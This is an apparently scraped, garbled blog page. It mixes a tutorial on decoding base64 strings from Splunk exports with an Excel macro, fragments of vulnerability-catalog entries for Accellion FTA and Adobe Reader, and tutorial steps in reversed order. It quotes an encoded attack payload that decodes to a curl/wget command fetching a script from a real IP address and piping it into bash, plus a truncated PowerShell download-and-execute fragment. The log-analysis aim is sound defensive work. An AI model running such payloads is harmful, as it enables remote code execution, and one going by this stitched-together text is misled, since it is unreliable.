![]() Powershell -c iex ((New-Object ).Accellion FTA OS Command Injection VulnerabilityĪccellion FTA 9_12_370 and earlier is affected by OS command execution via a crafted POST request to various admin endpoints.Īccellion FTA 9_12_411 and earlier is affected by OS command execution via a local web service call.Īccellion FTA SQL Injection VulnerabilityĪccellion FTA 9_12_370 and earlier is affected by SQL injection via a crafted Host header in a request to document_root.html.Īccellion FTA 9_12_411 and earlier is affected by SSRF via a crafted POST request to wmProgressstat.html.Īdobe Acrobat and Reader Heap-based Buffer Overflow VulnerabilityĪcrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a heap-based buffer overflow vulnerability. Next, we going to start decoding the base64 strings.Īgain, press Ctrl + Arrow-Down to go end of column, and type the formula as below: ![]() Your Excel will look something like this: Then paste/ Ctrl + V to fill all column with string “ ASCII“. Then, press Ctrl + Shift + Arrow-Up to select from bottom to top. After that, type in string “ ASCII” in one of the row and copy it ( Ctrl-C). Just press Ctrl + Arrow-Down to quickly go to end/bottom of data column. Let’s say you have 300 row of data in your Excel, then fill 300 of “ ASCII” strings besides it. We need to fill up column “ ASCII” with string “ ASCII” until end/bottom of your data. Then, create 2 new column in the Excel sheet column named “ ASCII” and “ Decoded Base64“: Paste macro code given above inside the editor:Īfter that, close the editor window. Create new macro – you can give any name you want. To use it, first, we need to open the Splunk result that we exported earlier.Īfter that, press Alt-F8 to open the macro editor. ![]() ![]() TextBase64Encode = Replace(Replace(.Text, vbCr, ""), vbLf, "")įunction TextBase64Decode(strBase64, strCharset) With CreateObject("MSXML2.DOMDocument").createElement("tmp") The macro code that we’ll be using as below:įunction TextBase64Encode(strText, strCharset) MACRO) to automatically decode those base64 strings for us. So… We going to leverage Excel & macro (yes. How can I quickly decode all these base64 strings? We not gonna decode it one-by-one aren’t we? There are hundreds or probably thousand of it. If you decode the base64 from the example of raw event above: KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g= The result after we export it from Splunk (opened in Excel) looks like: Using the Splunk query above, it will show you a table formatted data which contains extracted base64 under field named “ string“.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |